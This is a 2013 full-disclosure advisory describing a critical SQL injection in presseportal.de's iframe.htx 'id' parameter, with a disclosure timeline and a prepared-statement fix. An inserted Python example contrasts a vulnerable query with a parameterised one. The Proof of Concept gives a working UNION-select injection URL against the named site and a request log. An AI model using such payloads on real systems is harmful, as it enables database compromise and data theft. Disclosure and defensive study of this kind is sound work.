
List:       full-disclosure
Subject:    [Full-disclosure] NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2013-11-28 17:42:47
Message-ID: 52978097.2080008 () vulnerability-lab ! com

Document Title:
===============
NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1150

Lab News Article: http://www.vulnerability-lab.com/news/get_news.php?id=115


Release Date:
=============
2013-11-28


Vulnerability Laboratory ID (VL-ID):
====================================
1150


Common Vulnerability Scoring System:
====================================
8.7


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a critical SQL injection web vulnerability in the official News-Aktuell PressePortal web application.


Vulnerability Disclosure Timeline:
==================================
2013-04-26:	Researcher Notification & Coordination (Marco Onorati)
2013-05-01:	Vendor Notification (PressePortal Team)
2013-11-28:	Vendor Response/Feedback (PressePortal Team)
2013-11-28:	Vendor Fix/Patch (PressePortal Developer Team)
2013-11-29:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote SQL injection web vulnerability has been discovered in the official News-Aktuell PressePortal web application. The vulnerability allows a remote attacker to execute their own SQL commands through a vulnerable value in a GET request.

The vulnerability is located in the `../services/content` module, in the vulnerable iframe.htx file. Remote attackers are able to inject their own SQL commands through the vulnerable `id` parameter. After the injection the website returns an apparently blank page, but viewing the page source shows the result of the injected statement in the listed rss and context values. The issue is a classic remote SQL injection. The security risk of the remote SQL injection web vulnerability is estimated as critical, with a CVSS (Common Vulnerability Scoring System) count of 8.7(+).

Exploitation of the SQL injection web vulnerability requires no privileged web application user account and no user interaction. Successful exploitation of the vulnerability results in compromise of the web application (website), the account system and the DBMS.

Vulnerable Module(s):
				[+] services/content

Vulnerable File(s):
				[+] iframe.htx

Vulnerable Parameter(s):
				[+] id

Affected Domain(s):
				[+] http://www.presseportal.de


Proof of Concept (PoC):
=======================
The remote SQL injection web vulnerability can be exploited by remote attackers without user interaction and without a privileged web application user account. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.



PoC: Remote SQL Injection
http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true


-- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.presseportal.de/services/content/iframe.htx
?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI]
Content Size[3145] Mime Type[text/html]
   

Request Headers:
Host[www.presseportal.de]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1; PressePortalDeDst=portal6-pp.de; __utma=239002817.282394538.1385649109.1385649109.1385649109.1; __utmb=239002817.4.10.1385649109; __utmc=239002817; __utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=2%7C48; POPUPCHECK=1385735515782]
Connection[keep-alive]
Cache-Control[max-age=0]
   

Response Headers:
Date[Thu, 28 Nov 2013 14:52:27 GMT]
Server[Apache]
X-Powered-By[PHP/5.3.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[3145]
Connection[Keep-alive]
Via[1.1 AN-0003011040777600]




Reference(s):
http://www.presseportal.de/services/content/iframe.htx?id
https://www.presseportal.de/services/content/iframe.htx?id


Picture(s):
				../1.png
				../2.png
				../3.png


Resource(s):
				../iframe.htx.htm


Solution - Fix & Patch:
=======================
The vulnerability can be patched by using a secure (prepared) statement for the `id` GET parameter in the iframe.htx file.
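As an added example (not code from PressePortal or from this advisory), the string-concatenation defect described above beside the prepared statement the fix calls for, recreated in Python on a constructed in-memory SQLite table; the table layout, the 32-hex-character id format and sqlite_version() standing in for MySQL's @@version are assumptions.

```python
"""Added example (not PressePortal's or Vulnerability Lab's code): the defect
class described above and the prepared-statement fix the advisory recommends,
recreated on a constructed in-memory SQLite table.  sqlite_version() stands in
for the MySQL @@version used in the PoC; table layout and id format are assumptions."""
import re
import sqlite3

# Constructed rows standing in for the content iframe.htx renders (rss, context).
ROWS = [("b17ea41fbd7d93bcdda63799dd904314", "<rss>real feed</rss>", "real context")]

# Assumption: ids are 32-hex-character tokens, as the one in the PoC URL is.
ID_RE = re.compile(r"[0-9a-f]{32}")

# Same shape as the advisory's payload, with the column list sized to this table.
PAYLOAD = ROWS[0][0] + "' and 1=2 union select sqlite_version(),'x' -- "


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE content (id TEXT PRIMARY KEY, rss TEXT, context TEXT)")
    db.executemany("INSERT INTO content VALUES (?, ?, ?)", ROWS)
    return db


def fetch_vulnerable(db: sqlite3.Connection, content_id: str) -> list:
    # The defect: the GET value is pasted into the SQL text, so a quote in `id`
    # closes the literal and everything after it is parsed and executed as SQL.
    sql = f"SELECT rss, context FROM content WHERE id = '{content_id}'"
    return db.execute(sql).fetchall()


def fetch_prepared(db: sqlite3.Connection, content_id: str) -> list:
    # The fix: the value is bound as a parameter and can never become SQL text;
    # the payload above is simply compared against the id column and matches nothing.
    sql = "SELECT rss, context FROM content WHERE id = ?"
    return db.execute(sql, (content_id,)).fetchall()


def fetch_hardened(db: sqlite3.Connection, content_id: str) -> list:
    # Defence in depth: reject malformed ids before the query runs, which also
    # gives a clean point to log and alert on injection attempts.
    if not ID_RE.fullmatch(content_id):
        return []
    return fetch_prepared(db, content_id)


if __name__ == "__main__":
    db = make_db()
    print(fetch_vulnerable(db, PAYLOAD))    # leaks the DBMS version via the union
    print(fetch_prepared(db, PAYLOAD))      # []  (payload treated as a literal id)
    print(fetch_hardened(db, ROWS[0][0]))   # the legitimate row
```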


Security Risk:
==============
The security risk of the remote SQL injection web vulnerability is estimated as critical. The vulnerability allows attackers to compromise the application, the web server and the service DBMS.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Marco Onorati (m.onorati@web.de) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

